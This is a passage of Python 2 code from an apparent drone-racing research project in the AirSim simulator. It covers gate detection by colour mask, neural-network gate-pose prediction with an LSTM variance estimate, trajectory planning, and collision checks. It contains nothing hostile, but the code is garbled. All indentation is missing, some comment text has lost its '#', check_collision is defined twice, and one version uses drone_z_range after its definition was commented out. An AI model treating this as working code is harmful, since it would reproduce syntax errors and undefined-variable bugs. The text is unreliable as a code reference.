quad_pose = [self.track[0].position.x_val, self.track[0].position.y_val, self.track[0].position.z_val, -phi, -theta, psi]
self.client.simSetVehiclePose(QuadPose(quad_pose), True)
time.sleep(1)
self.check_collision()
rot_matrix = Rotation.from_quat([self.track[0].orientation.x_val, self.track[0].orientation.y_val,
self.track[0].orientation.z_val, self.track[0].orientation.w_val]).as_dcm().reshape(3,3)
gate_x_range = [0.5, -0.75]
gate_z_range = [0.5, -0.75]
edge_ind = 0
#print "\nGate Ind: {0}, Gate x={1:.3}, y={2:.3}, z={3:.3}".format(i+1, self.track[i].position.x_val, self.track[i].position.y_val, self.track[i].position.z_val)
gate_pos = np.array([self.track[0].position.x_val, self.track[0].position.y_val, self.track[0].position.z_val])
gate_edge_list = []
for x_rng in gate_x_range:
gate_edge_range = np.array([x_rng, 0., 0.])
gate_edge_world = np.dot(rot_matrix, gate_edge_range.reshape(-1,1)).ravel()
gate_edge_point = np.array([gate_pos[0]+gate_edge_world[0], gate_pos[1]+gate_edge_world[1], gate_pos[2]+gate_edge_world[2]])
print "\nDrone Pos x={0:.3}, y={1:.3}, z={2:.3}".format(gate_edge_point[0], gate_edge_point[1], gate_edge_point[2])
self.quad.state = [gate_edge_point[0], gate_edge_point[1], gate_edge_point[2], phi, theta, psi, 0., 0., 0., 0., 0., 0.]
quad_pose = [gate_edge_point[0], gate_edge_point[1], gate_edge_point[2], -phi, -theta, psi]
self.client.simSetVehiclePose(QuadPose(quad_pose), True)
self.check_collision()
time.sleep(5)
for z_rng in gate_z_range:
gate_edge_range = np.array([0., 0., z_rng])
gate_edge_world = np.dot(rot_matrix, gate_edge_range.reshape(-1,1)).ravel()
gate_edge_point = np.array([gate_pos[0]+gate_edge_world[0], gate_pos[1]+gate_edge_world[1], gate_pos[2]+gate_edge_world[2]])
edge_ind += 1
print "\nDrone Pos x={0:.3}, y={1:.3}, z={2:.3}".format(gate_edge_point[0], gate_edge_point[1], gate_edge_point[2])
self.quad.state = [gate_edge_point[0], gate_edge_point[1], gate_edge_point[2], phi, theta, psi, 0., 0., 0., 0., 0., 0.]
quad_pose = [gate_edge_point[0], gate_edge_point[1], gate_edge_point[2], -phi, -theta, psi]
self.client.simSetVehiclePose(QuadPose(quad_pose), True)
self.check_collision()
time.sleep(5)
def check_collision(self, max_distance = 0.15):
drone_x_range = [.1, -.1]
drone_y_range = [.1, -.1]
# drone_z_range = [.05, -.05]
rot_matrix = R.from_euler('ZYX',[self.quad.state[5], self.quad.state[4], self.quad.state[3]],degrees=False).as_dcm()
drone_pos = np.array([self.quad.state[0], self.quad.state[1], self.quad.state[2]])
edge_ind = 0
eps = 0.1
for i, line in enumerate(self.line_list):
edge_i, edge_j = line[0], line[1]
same_point_ind = abs(edge_i - edge_j) <= eps
diff_point_ind = abs(edge_i - edge_j) > eps
edge_upper_limit = edge_i[same_point_ind] + max_distance
edge_lower_limit = edge_i[same_point_ind] - max_distance
on_same_line_cond = (edge_lower_limit < drone_pos[same_point_ind]) & (drone_pos[same_point_ind] < edge_upper_limit)
if np.all(on_same_line_cond):
if (edge_i[diff_point_ind] <= drone_pos[diff_point_ind] <= edge_j[diff_point_ind]) or \
(edge_j[diff_point_ind] <= drone_pos[diff_point_ind] <= edge_i[diff_point_ind]):
print "Collision detected!"
print "Ind: {0}, Drone center x={1:.3}, y={2:.3}, z={3:.3}".format(i, drone_pos[0], drone_pos[1], drone_pos[2])
return True
for x_rng in drone_x_range:
for y_rng in drone_y_range:
for z_rng in drone_z_range:
drone_range = np.array([x_rng, y_rng, z_rng])
drone_range_world = np.dot(rot_matrix, drone_range.reshape(-1,1)).ravel()
drone_edge_point = np.array([drone_pos[0]+drone_range_world[0], drone_pos[1]+drone_range_world[1], drone_pos[2]+drone_range_world[2]])
edge_ind += 1
for i, line in enumerate(self.line_list):
edge_i, edge_j = line[0], line[1]
same_point_ind = abs(edge_i - edge_j) <= eps
diff_point_ind = abs(edge_i - edge_j) > eps
edge_upper_limit = edge_i[same_point_ind] + max_distance
edge_lower_limit = edge_i[same_point_ind] - max_distance
on_same_line_cond = (edge_lower_limit < drone_edge_point[same_point_ind]) & (drone_edge_point[same_point_ind] < edge_upper_limit)
if np.all(on_same_line_cond):
if (edge_i[diff_point_ind] <= drone_edge_point[diff_point_ind] <= edge_j[diff_point_ind]) or \
(edge_j[diff_point_ind] <= drone_edge_point[diff_point_ind] <= edge_i[diff_point_ind]):
print "Collision detected!"
print "Ind: {0}, Corner x={1:.3}, y={2:.3}, z={3:.3}".format(edge_ind, drone_edge_point[0], drone_edge_point[1], drone_edge_point[2])
return True
return False
def isThereAnyGate(self, img_rgb):
# loop over the boundaries
lower, upper = [100, 17, 15], [200, 50, 56]
create NumPy arrays from the boundaries
lower = np.array(lower, dtype = "uint8")
upper = np.array(upper, dtype = "uint8")
find the colors within the specified boundaries and apply
the mask
mask = cv2.inRange(img_rgb, lower, upper)
output = cv2.bitwise_and(img_rgb, img_rgb, mask = mask)
if output.any():
#print "there is a gate on the frame!"
return True
return False
def test_algorithm(self, method = "MAX", use_model = False):
pose_prediction = np.zeros((1000,4),dtype=np.float32)
prediction_std = np.zeros((4,1),dtype=np.float32)
labels_dict = {0:3, 1:4, 2:5, 3:10, 4:-1}
gate_target = self.track[0]
gate_psi = Rotation.from_quat([gate_target.orientation.x_val, gate_target.orientation.y_val, gate_target.orientation.z_val, gate_target.orientation.w_val]).as_euler('ZYX',degrees=False)[0]
psi_start = gate_psi - np.pi/2 #drone kapi karsisinde olacak sekilde durmali
#if drone is at initial point
quad_pose = [self.drone_init.position.x_val, self.drone_init.position.y_val, self.drone_init.position.z_val, 0., 0., psi_start]
self.state0 = [self.drone_init.position.x_val, self.drone_init.position.y_val, self.drone_init.position.z_val, 0., 0., psi_start, 0., 0., 0., 0., 0., 0.]
self.client.simSetVehiclePose(QuadPose(quad_pose), True)
self.quad = Quadrotor(self.state0)
self.curr_idx = 0
self.test_states[method].append(self.quad.state)
self.xd_ddot_pr = 0.
self.yd_ddot_pr = 0.
self.xd_dddot_pr = 0.
self.yd_dddot_pr = 0.
self.psid_pr = 0.
self.psid_dot_pr = 0.
track_completed = False
fail_check = False
collision_check = False
init_start = True
final_target = [self.track[-1].position.x_val, self.track[-1].position.y_val, self.track[-1].position.z_val]
# To check collision algorithm, comment it out
# for i in range(100):
# gate_index = np.random.randint(0,5)
# self.test_collision(gate_index)
if self.flight_log:
f=open(self.log_path, "a")
while((not track_completed) and (not fail_check)):
image_response = self.client.simGetImages([airsim.ImageRequest('0', airsim.ImageType.Scene, False, False)])[0]
#if len(image_response.image_data_uint8) == image_response.width * image_response.height * 3:
img1d = np.fromstring(image_response.image_data_uint8, dtype=np.uint8) # get numpy array
img_rgb = img1d.reshape(image_response.height, image_response.width, 3) # reshape array to 4 channel image array H X W X 3
img_rgb = cv2.cvtColor(img_rgb, cv2.COLOR_BGR2RGB)
anyGate = self.isThereAnyGate(img_rgb)
#cv2.imwrite(os.path.join(self.base_path, 'images', "frame" + str(self.curr_idx).zfill(len(str(self.num_samples))) + '.png'), img_rgb)
img = Image.fromarray(img_rgb)
image = self.transformation(img)
quad_pose = [self.quad.state[0], self.quad.state[1], self.quad.state[2], -self.quad.state[3], -self.quad.state[4], self.quad.state[5]]
with torch.no_grad():
# Determine Gat location with Neural Networks
pose_gate_body = self.Dronet(image)
if self.curr_idx % 6 == 0:
noise_coeff = np.random.uniform(-1,1)
elif self.curr_idx % 3 == 0:
noise_coeff = 0.
pose_gate_body[0][0] += (noise_coeff*pose_gate_body[0][0])
pose_gate_body = np.asarray(pose_gate_body.reshape(-1,1).to('cpu')).reshape(-1,1)
pose_prediction[self.curr_idx] = pose_gate_body.ravel()
# for i,num in enumerate(pose_gate_body.reshape(-1,1)):
# #print(num, i , self.curr_idx)
# pose_prediction[self.curr_idx][i] = num.item()
# if self.curr_idx % 12 == 0:
# self.brightness = random.uniform(30.,40.)
# self.contrast = random.uniform(30.,40.)
# self.saturation = random.uniform(30.,40.)
# self.transformation = transforms.Compose([
# transforms.Resize([200, 200]),
# #transforms.Lambda(self.gaussian_blur),
# transforms.ColorJitter(brightness=self.brightness, contrast=self.contrast, saturation=self.saturation),
# transforms.ToTensor()])
# elif self.curr_idx % 6 == 0:
# self.brightness = random.uniform(0.,1.)
# self.contrast = random.uniform(0.,1.)
# self.saturation = random.uniform(0.,1.)
# self.transformation = transforms.Compose([
# transforms.Resize([200, 200]),
# #transforms.Lambda(self.gaussian_blur),
# transforms.ColorJitter(brightness=self.brightness, contrast=self.contrast, saturation=self.saturation),
# transforms.ToTensor()])
if self.curr_idx >= 11:
pose_gate_cov = self.lstmR(torch.from_numpy(pose_prediction[self.curr_idx-11:self.curr_idx+1].reshape(1,12,4)).to(self.device))
for i, p_g_c in enumerate(pose_gate_cov.reshape(-1,1)):
prediction_std[i] = p_g_c.item()
# Gate ground truth values will be implemented
pose_gate_body = pose_gate_body.reshape(-1,1)
prediction_std = np.clip(prediction_std, 0, prediction_std)
prediction_std = prediction_std.ravel()
covariance_sum = np.sum(prediction_std)
# Trajectory generate
waypoint_world = spherical_to_cartesian(self.quad.state, pose_gate_body)
pos0 = [self.quad.state[0], self.quad.state[1], self.quad.state[2]]
vel0 = [self.quad.state[6], self.quad.state[7], self.quad.state[8]]
acc0 = [0.,0.,0.]
posf = [waypoint_world[0], waypoint_world[1], waypoint_world[2]]
accf = [0.,0.,0.]
yaw0 = self.quad.state[5]
yaw_diff = pose_gate_body[3][0]
yawf = (self.quad.state[5]+yaw_diff) + np.pi/2
#yawf = Rotation.from_quat([self.track[self.current_gate].orientation.x_val, self.track[self.current_gate].orientation.y_val,
# self.track[self.current_gate].orientation.z_val, self.track[self.current_gate].orientation.w_val]).as_euler('ZYX',degrees=False)[0] - np.pi/2
print "\nCurrent index: {0}".format(self.curr_idx)
print "Predicted r: {0:.3}, Variance r: {1:.3}".format(pose_gate_body[0][0], prediction_std[0])
print "Gate Predicted, x: {0:.3}, y: {1:.3}, z: {2:.3}, psi: {3:.3} deg".format(waypoint_world[0], waypoint_world[1], waypoint_world[2], yawf*180/np.pi)
print "Brightness: {0:.3}, Contast: {1:.3}, Saturation: {2:.3}".format(self.brightness, self.contrast, self.saturation)
#print "Variance values, r: {0:.3}, phi: {1:.3}, theta: {2:.3}, psi: {3:.3}".format(prediction_std[0], prediction_std[1], prediction_std[2], prediction_std[3])
if self.flight_log:
f.write("\nCurrent index: {0}".format(self.curr_idx))
f.write("\nPredicted r: {0:.3}, Variance r: {1:.3}".format(pose_gate_body[0][0], prediction_std[0]))
f.write("\nGate Predicted, x: {0:.3}, y: {1:.3}, z: {2:.3}, psi: {3:.3} deg".format(waypoint_world[0], waypoint_world[1], waypoint_world[2], yawf*180/np.pi))
f.write("\nBrightness: {0:.3}, Contast: {1:.3}, Saturation: {2:.3}".format(self.brightness, self.contrast, self.saturation))
#f.write("\nVariance values, r: {0:.3}, phi: {1:.3}, theta: {2:.3}, psi: {3:.3}".format(prediction_std[0], prediction_std[1], prediction_std[2], prediction_std[3]))
#f.write("\nBlur coefficient: {0:.3}/{1:.3}. Variance sum: {2:.3}".format(self.blur_coeff, self.blur_range, covariance_sum))
min_jerk_check = False
if use_model:
#true_init_x, true_init_y, true_init_z, blur_coeff, var_sum, diff_x, diff_y, diff_z, diff_phi, diff_theta, diff_psi, r_std, phi_std, theta_std, psi_std, Tf, MP_Method, Cost
#[arr[i][5],arr[i][6],arr[i][7],arr[i][8],arr[i][9],arr[i][10], arr[i][4],arr[i][11],arr[i][12],arr[i][13],arr[i][14],int(arr[i][16])]
X_test = np.array([posf[0]-pos0[0], posf[1]-pos0[1], posf[2]-pos0[2], -self.quad.state[3], -self.quad.state[4], yawf-yaw0,
covariance_sum, prediction_std[0], prediction_std[1], prediction_std[2], prediction_std[3]]).reshape(1,-1)
X_mp_test = self.mp_scaler.transform(X_test)
X_time_test = self.time_scaler.transform(X_test)
mp_method = self.predict(X_mp_test, model=self.mp_classifier, isClassifier=True)
self.trajSelect[0] = labels_dict[mp_method]
self.trajSelect[1] = 2
self.trajSelect[2] = 0
if self.trajSelect[0] != -1:
print "Predicted MP Algorithm: ", self.MP_names[int(self.trajSelect[0])]
self.Tf = self.predict(X_time_test, model=self.time_regressor, isClassifier=False)
print "Time based trajectory, T: {0:.3}".format(self.Tf)
print "Predicted Time Length: {0:.3}".format(self.Tf)
if self.flight_log:
f.write("\nTime based trajectory, T: {0:.3}".format(self.Tf))
f.write("\nPredicted Time Length: {0:.3}".format(self.Tf))
else:
print "Drone is in Safe Mode"
if self.flight_log:
f.write("\nDrone is in Safe Mode")
if labels_dict[mp_method] == 5: #min_jerk
min_jerk_check = True
else:
self.trajSelect[0] = self.MP_methods[method]
self.trajSelect[1] = 2
self.trajSelect[2] = 0
self.Tf = self.time_coeff*abs(pose_gate_body[0][0])
#print "Prediction mode is off. MP algorithm: " + method
#print "Estimated time of arrival: " + str(self.Tf) + " s."
if self.flight_log:
f.write("\nPrediction mode is off. MP algorithm: " + method)
f.write("\nEstimated time of arrival: " + str(self.Tf) + " s.")
if method == "min_jerk":
min_jerk_check = True
if self.trajSelect[0] != -1:
velf = [float(posf[0]-pos0[0])/self.Tf, float(posf[1]-pos0[1])/self.Tf, float(posf[2]-pos0[2])/self.Tf]
time_list = np.hstack((0., self.Tf)).astype(float)
waypoint_list = np.vstack((pos0, posf)).astype(float)
yaw_list = np.hstack((yaw0, yawf)).astype(float)
self.test_arrival_time[method] += self.Tf
if min_jerk_check:
mp_algorithm = MyTraj(gravity = -9.81)
traj = mp_algorithm.givemetraj(pos0, vel0, acc0, posf, velf, accf, self.Tf)
newTraj = Trajectory(self.trajSelect, self.quad.state, time_list, waypoint_list, yaw_list)
flight_period = self.Tf / self.period_denum
Waypoint_length = flight_period // self.dtau
if init_start:
t_list = linspace(0, flight_period, num = Waypoint_length)
init_start = False
else:
t_list = linspace(flight_period, 2*flight_period, num = Waypoint_length)
self.vel_sum = 0.
self.quad.costValue = 0.
# Call for Controller
for ind, t_current in enumerate(t_list):
self.vel_sum += (self.quad.state[6]**2+self.quad.state[7]**2+self.quad.state[8]**2)
pos_des, vel_des, acc_des, euler_des = newTraj.desiredState(t_current, self.dtau, self.quad.state)
if min_jerk_check:
pos_des, vel_des, acc_des = mp_algorithm.givemepoint(traj, t_current)
xd, yd, zd = pos_des[0], pos_des[1], pos_des[2]
xd_dot, yd_dot, zd_dot = vel_des[0], vel_des[1], vel_des[2]
xd_ddot, yd_ddot, zd_ddot = acc_des[0], acc_des[1], acc_des[2]
xd_dddot = (xd_ddot - self.xd_ddot_pr) / self.dtau
yd_dddot = (yd_ddot - self.yd_ddot_pr) / self.dtau
xd_ddddot = (xd_dddot - self.xd_dddot_pr) / self.dtau
yd_ddddot = (yd_dddot - self.yd_dddot_pr) / self.dtau
psid = euler_des[2]
psid_dot = (psid - self.psid_pr) / self.dtau
psid_ddot = (psid_dot - self.psid_dot_pr) / self.dtau
current_traj = [xd, yd, zd, xd_dot, yd_dot, zd_dot, xd_ddot, yd_ddot, zd_ddot,
xd_dddot, yd_dddot, xd_ddddot, yd_ddddot,
psid, psid_dot, psid_ddot]
fail_check = self.quad.simulate(self.dtau, current_traj, final_target, prediction_std)
if ind % self.collision_check_interval == 0:
collision_check = self.check_collision()
quad_pose = [self.quad.state[0], self.quad.state[1], self.quad.state[2], -self.quad.state[3], -self.quad.state[4], self.quad.state[5]]
self.test_states[method].append(self.quad.state)
self.client.simSetVehiclePose(QuadPose(quad_pose), True)
self.xd_ddot_pr = xd_ddot
self.yd_ddot_pr = yd_ddot
self.xd_dddot_pr = xd_dddot
self.yd_dddot_pr = yd_dddot
self.psid_pr = psid
self.psid_dot_pr = psid_dot
self.x_dot_pr = self.quad.state[6]
self.y_dot_pr = self.quad.state[7]
self.z_dot_pr = self.quad.state[8]
if collision_check:
self.quad.costValue = 1e12
self.test_costs[method] = self.quad.costValue
print "Drone has collided with the gate! Current cost: {0:.6}".format(self.test_costs[method])
if self.flight_log:
f.write("\nDrone has collided with the gate! Current cost: {0:.6}".format(self.test_costs[method]))
break
elif fail_check:
self.quad.costValue = 1e12
self.test_costs[method] = self.quad.costValue
print "Drone has crashed! Current cost: {0:.6}".format(self.test_costs[method])
if self.flight_log:
f.write("\nDrone has crashed! Current cost: {0:.6}".format(self.test_costs[method]))
break
elif not anyGate:
self.quad.costValue = 1e12
self.test_costs[method] = self.quad.costValue
print "Drone has been out of the path! Current cost: {0:.6}".format(self.test_costs[method])
if self.flight_log:
f.write("\nDrone has been out of the path! Current cost: {0:.6}".format(self.test_costs[method]))
break
check_arrival = self.check_completion(quad_pose)
if check_arrival: # drone arrives to the gate
track_completed = True
self.vel_sum = self.vel_sum / (ind + 1)
self.test_costs[method] = self.Tf * self.quad.costValue
print "Drone has finished the lap. Current cost: {0:.6}".format(self.test_costs[method])
if self.flight_log:
f.write("\nDrone has finished the lap. Current cost: {0:.6}".format(self.test_costs[method]))
break
if (not track_completed) and (not fail_check) and (not collision_check) and (anyGate): # drone didn't arrive or crash
self.vel_sum = self.vel_sum / Waypoint_length
#print "Velocity Sum (Normalized): ", self.vel_sum
self.test_costs[method] = self.Tf * self.quad.costValue
print "Drone hasn't reached the gate yet. Current cost: {0:.6}".format(self.test_costs[method])
if self.flight_log:
f.write("\nDrone hasn't reached the gate yet. Current cost: {0:.6}".format(self.test_costs[method]))
if track_completed or fail_check or collision_check or not anyGate: # drone arrived to the gate or crashed or collided
break
self.curr_idx += 1
if self.flight_log:
f.close()
def check_collision(self, max_distance = 0.15):
drone_x_range = [.1, -.1]
drone_y_range = [.1, -.1]
# drone_z_range = [.05, -.05]
rot_matrix = R.from_euler('ZYX',[self.quad.state[5], self.quad.state[4], self.quad.state[3]],degrees=False).as_dcm()
drone_pos = np.array([self.quad.state[0], self.quad.state[1], self.quad.state[2]])
edge_ind = 0
eps = 0.1
for i, line in enumerate(self.line_list):
distance = line.distance(Point3D(drone_pos[0], drone_pos[1], drone_pos[2])).evalf()
edge_i, edge_j, u_v = self.line_list_2[i]
distance_from_center = edge_i - drone_pos
distance_2 = np.linalg.norm(np.cross(distance_from_center, u_v)) / np.linalg.norm(u_v)
print "Edge: {0}, (Symbolic) Distance from the center: {1:.3}".format(i, distance)
print "Edge: {0}, (Numeric) Distance from the center: {1:.3}".format(i, distance_2)
if distance < max_distance:
print "Collision detected!"
#print "Index: {0}, Drone center x={1:.3}, y={2:.3}, z={3:.3}".format(i, drone_pos[0], drone_pos[1], drone_pos[2])
return True
# for x_rng in drone_x_range:
# for y_rng in drone_y_range:
# # for z_rng in drone_z_range:
# drone_range = np.array([x_rng, y_rng, 0.])
# drone_range_world = np.dot(rot_matrix, drone_range.reshape(-1,1)).ravel()
# drone_edge_point = np.array([drone_pos[0]+drone_range_world[0], drone_pos[1]+drone_range_world[1], drone_pos[2]+drone_range_world[2]])
# edge_ind += 1
# for i, line in enumerate(self.line_list):
# distance = line.distance(Point3D(drone_edge_point[0], drone_edge_point[1], drone_edge_point[2])).evalf()
# #print "Edge: {0}, Distance from the center: {1:.3}".format(i, distance)
# if distance < max_distance:
# print "Collision detected!"
# print "Ind: {0}, Drone center x={1:.3}, y={2:.3}, z={3:.3}".format(i, drone_pos[0], drone_pos[1], drone_pos[2])
# return True
#print "No Collision!"
return False
# def fly_drone(self, f, gate_index, method, pos_ranges, angles_start):
# pose_prediction = np.zeros((2000,4),dtype=np.float32)
# prediction_std = np.zeros((4,1),dtype=np.float32)
# x_range, y_range, z_range = pos_ranges
# phi_start, theta_start, gate_psi, psi_start = angles_start
# if gate_index == 0: #if drone is at initial point
# quad_pose = [self.drone_init.position.x_val+x_range, self.drone_init.position.y_val+y_range, self.drone_init.position.z_val+z_range, -phi_start, -theta_start, psi_start]
# self.state0 = [self.drone_init.position.x_val+x_range, self.drone_init.position.y_val+y_range, self.drone_init.position.z_val+z_range, phi_start, theta_start, psi_start, 0., 0., 0., 0., 0., 0.]
# true_init_pos = [self.drone_init.position.x_val, self.drone_init.position.y_val, self.drone_init.position.z_val]
# else:
# quad_pose = [self.track[gate_index-1].position.x_val+x_range, self.track[gate_index-1].position.y_val+y_range, self.track[gate_index-1].position.z_val+z_range, -phi_start, -theta_start, psi_start]
# self.state0 = [self.track[gate_index-1].position.x_val+x_range, self.track[gate_index-1].position.y_val+y_range, self.track[gate_index-1].position.z_val+z_range, phi_start, theta_start, psi_start, 0., 0., 0., 0., 0., 0.]
# true_init_pos = [self.track[gate_index-1].position.x_val, self.track[gate_index-1].position.y_val, self.track[gate_index-1].position.z_val]
# self.client.simSetVehiclePose(QuadPose(quad_pose), True)
# self.quad = Quadrotor(self.state0)
# # this is only used for yaw motion planning
# self.trajSelect[0] = self.MP_methods[method]
# self.trajSelect[1] = 2
# self.trajSelect[2] = 0
# self.curr_idx = 0
# #self.Controller_states[method].append(self.quad.state)
# self.MP_states[method].append(self.quad.state)
# self.xd_ddot_pr = 0.
# self.yd_ddot_pr = 0.
# self.xd_dddot_pr = 0.
# self.yd_dddot_pr = 0.
# self.psid_pr = 0.
# self.psid_dot_pr = 0.
# cov_coeff = 0.
# initial_start = True
# final_target = [self.track[gate_index].position.x_val, self.track[gate_index].position.y_val, self.track[gate_index].position.z_val]
# print "\n>>>MP Method: ", method
# track_completed = False
# fail_check = False
# if self.flight_log:
# f.write("\n\n>>>MP Method: %s " %method)
# while((not track_completed) and (not fail_check)):
# image_response = self.client.simGetImages([airsim.ImageRequest('0', airsim.ImageType.Scene, False, False)])[0]
# #if len(image_response.image_data_uint8) == image_response.width * image_response.height * 3:
# img1d = np.fromstring(image_response.image_data_uint8, dtype=np.uint8) # get numpy array
# img_rgb = img1d.reshape(image_response.height, image_response.width, 3) # reshape array to 4 channel image array H X W X 3
# img_rgb = cv2.cvtColor(img_rgb, cv2.COLOR_BGR2RGB)
# #cv2.imwrite(os.path.join(self.base_path, 'images', "frame" + str(self.curr_idx).zfill(len(str(self.num_samples))) + '.png'), img_rgb)
# img = Image.fromarray(img_rgb)
# image = self.transformation(img)
# quad_pose = [self.quad.state[0], self.quad.state[1], self.quad.state[2], -self.quad.state[3], -self.quad.state[4], self.quad.state[5]]
# with torch.no_grad():
# # Determine Gat location with Neural Networks
# pose_gate_body = self.Dronet(image)
# for i,num in enumerate(pose_gate_body.reshape(-1,1)):
# #print(num, i , self.curr_idx)
# pose_prediction[self.curr_idx][i] = num.item()
# if self.curr_idx >= 11:
# pose_gate_cov = self.lstmR(torch.from_numpy(pose_prediction[self.curr_idx-11:self.curr_idx+1].reshape(1,12,4)).to(self.device))
# for i, p_g_c in enumerate(pose_gate_cov.reshape(-1,1)):
# prediction_std[i] = p_g_c.item()
# # Gate ground truth values will be implemented
# pose_gate_body = pose_gate_body.numpy().reshape(-1,1)
# prediction_std = np.clip(prediction_std, 0, prediction_std)
# prediction_std = prediction_std.ravel()
# covariance_sum = np.sum(prediction_std)
# # r,theta,psi,phi = pose_gate_body[0][0],pose_gate_body[1][0],pose_gate_body[2][0],pose_gate_body[3][0] # notation is different. In our case, phi equals to psi
# # q1,q2,q3,q4 = R.from_euler('ZYX',[self.quad.state[5], self.quad.state[4], self.quad.state[3]], degrees=False).as_quat()
# # quad_pose = Pose(Vector3r(self.quad.state[0], self.quad.state[1],self.quad.state[2]),Quaternionr(q1,q2,q3,q4))
# # estimation = geom_utils.debugGatePoses(quad_pose , r, theta, psi)
# # Trajectory generate
# self.Tf = self.time_coeff*pose_gate_body[0][0] # T=r*0.5
# waypoint_world = spherical_to_cartesian(self.quad.state, pose_gate_body)
# pos0 = [self.quad.state[0], self.quad.state[1], self.quad.state[2]]
# vel0 = [self.quad.state[6], self.quad.state[7], self.quad.state[8]]
# #acc0 = [float(self.quad.state[6]-self.x_dot_pr)/self.dtau, float(self.quad.state[7]-self.y_dot_pr)/self.dtau, float(self.quad.state[8]-self.z_dot_pr)/self.dtau]
# acc0 = [0., 0., 0.]
# yaw0 = self.quad.state[5]
# posf = [waypoint_world[0], waypoint_world[1], waypoint_world[2]]
# velf = [float(posf[0]-pos0[0])/self.Tf, float(posf[1]-pos0[1])/self.Tf, float(posf[2]-pos0[2])/self.Tf]
# accf = [0., 0., 0.]
# yaw_diff = pose_gate_body[3][0]
# yawf = (self.quad.state[5]+yaw_diff) + np.pi/2
# pos_next = np.array(velf) * self.Tf
# time_list = np.hstack((0., self.Tf, 2*self.Tf)).astype(float)
# waypoint_list = np.vstack((pos0, posf, pos_next)).astype(float)
# yaw_list = np.hstack((yaw0, yawf, yawf)).astype(float)
# newTraj = Trajectory(self.trajSelect, self.quad.state, time_list, waypoint_list, yaw_list)
# print "\nTime of arrival: {0:.3} s., time coefficient: {1:.3}".format(self.Tf, self.time_coeff)
# print "Gate Predicted, x: {0:.3}, y: {1:.3}, z: {2:.3}, psi: {3:.3} deg".format(waypoint_world[0], waypoint_world[1], waypoint_world[2], yawf*180/np.pi)
# print "Gate Ground truth, x: {0:.3}, y: {1:.3}, z: {2:.3}, psi: {3:.3} deg".format(final_target[0], final_target[1], final_target[2], (gate_psi-np.pi/2)*180/np.pi)
# print "Variance values, r: {0:.3}, phi: {1:.3}, theta: {2:.3}, psi: {3:.3}".format(prediction_std[0], prediction_std[1], prediction_std[2], prediction_std[3])
# print "Blurring coefficient: {0:.3}/{1:.3}".format(self.blur_coeff,self.blur_range)
# if self.flight_log:
# f.write("\nTime of arrival: {0:.3}, time coefficient: {1:.3}".format(self.Tf, self.time_coeff))
# f.write("\nGate Predicted, x: {0:.3}, y: {1:.3}, z: {2:.3}, psi: {3:.3} deg".format(waypoint_world[0], waypoint_world[1], waypoint_world[2], yawf*180/np.pi))
# f.write("\nGate Ground truth, x: {0:.3}, y: {1:.3}, z: {2:.3}, psi: {3:.3} deg".format(self.track[gate_index].position.x_val, self.track[gate_index].position.y_val, self.track[gate_index].position.z_val, (gate_psi-np.pi/2)*180/np.pi))
# f.write("\nVariance values, r: {0:.3}, phi: {1:.3}, theta: {2:.3}, psi: {3:.3}".format(prediction_std[0], prediction_std[1], prediction_std[2], prediction_std[3]))
# f.write("\nBlurring coefficient: {0:.3}".format(self.blur_coeff))
# # if initial_start:
# # init_time = 0.
# # initial_start = False
# # else:
# # init_time = newTraj.t_wps[1] / 6.0
# Waypoint_length = newTraj.t_wps[1] // self.dtau
# t_list = linspace(0., newTraj.t_wps[1], num = Waypoint_length)
# # if time_or_speed == 0:
# # newTraj = Trajectory(self.trajSelect, self.quad.state, self.Tf, pos0, posf, yaw0, yawf)
# # print "Time based trajectory, T: {0:.3}".format(newTraj.t_wps[1])
# # if self.flight_log:
# # f.write("Time based trajectory, T: {0:.3}".format(newTraj.t_wps[1]))
# # else:
# # newTraj = Trajectory(self.trajSelect, self.quad.state, 1.0, pos0, posf, yaw0, yawf, v_average=self.v_average)
# # print "Velocity based trajectory, V_avg: {0:.3}, T: {1:.3}".format(self.v_average, newTraj.t_wps[1])
# # if self.flight_log:
# # f.write("Velocity based trajectory, V_avg: {0:.3}, T: {1:.3}".format(self.v_average, newTraj.t_wps[1]))
# # mp_algorithm = MyTraj(gravity = -9.81)
# # traj = mp_algorithm.givemetraj(pos0, vel0, acc0, posf, velf, accf, self.Tf)
# # Waypoint_length = int(self.Tf / self.dtau)
# # t_list = linspace(0., self.Tf, num = Waypoint_length)
# for t_current in t_list:
# pos_des, vel_des, acc_des, euler_des = newTraj.desiredState(t_current, self.dtau, self.quad.state)
# #pos_des, vel_des, acc_des = mp_algorithm.givemepoint(traj, t_current)
# xd, yd, zd = pos_des[0], pos_des[1], pos_des[2]
# xd_dot, yd_dot, zd_dot = vel_des[0], vel_des[1], vel_des[2]
# xd_ddot, yd_ddot, zd_ddot = acc_des[0], acc_des[1], acc_des[2]
# xd_dddot = (xd_ddot - self.xd_ddot_pr) / self.dtau
# yd_dddot = (yd_ddot - self.yd_ddot_pr) / self.dtau
# xd_ddddot = (xd_dddot - self.xd_dddot_pr) / self.dtau
# yd_ddddot = (yd_dddot - self.yd_dddot_pr) / self.dtau
# psid = euler_des[2]
# psid_dot = (psid - self.psid_pr) / self.dtau
# psid_ddot = (psid_dot - self.psid_dot_pr) / self.dtau
# current_traj = [xd, yd, zd, xd_dot, yd_dot, zd_dot, xd_ddot, yd_ddot, zd_ddot,
# xd_dddot, yd_dddot, xd_ddddot, yd_ddddot,
# psid, psid_dot, psid_ddot]
# fail_check = self.quad.simulate(self.dtau, current_traj, final_target, prediction_std)
# quad_pose = [self.quad.state[0], self.quad.state[1], self.quad.state[2], -self.quad.state[3], -self.quad.state[4], self.quad.state[5]]
# self.MP_states[method].append(self.quad.state)
# self.client.simSetVehiclePose(QuadPose(quad_pose), True)
# self.xd_ddot_pr = xd_ddot
# self.yd_ddot_pr = yd_ddot
# self.xd_dddot_pr = xd_dddot
# self.yd_dddot_pr = yd_dddot
# self.psid_pr = psid
# self.psid_dot_pr = psid_dot
# if fail_check:
# self.MP_cost[method] = self.quad.costValue
# print "Drone has crashed! Current cost: {0:.6}".format(self.MP_cost[method])
# if self.flight_log:
# f.write("\nDrone has crashed! Current cost: {0:.6}".format(self.MP_cost[method]))
# break
# check_arrival, on_road = self.check_completion(quad_pose, gate_index=gate_index)
# if check_arrival: # drone arrives to the gate
# track_completed = True
# self.MP_cost[method] = self.Tf * self.quad.costValue + cov_coeff*np.sum(prediction_std)
# print "Drone has arrived to the {0}. gate. Current cost: {1:.6}".format(gate_index+1, self.MP_cost[method])
# if self.flight_log:
# f.write("\nDrone has arrived to the {0}. gate. Current cost: {1:.6}".format(gate_index+1, self.MP_cost[method]))
# break
# elif not on_road: #drone can not complete the path, but still loop should be ended
# track_completed = True
# self.MP_cost[method] = self.quad.costValue
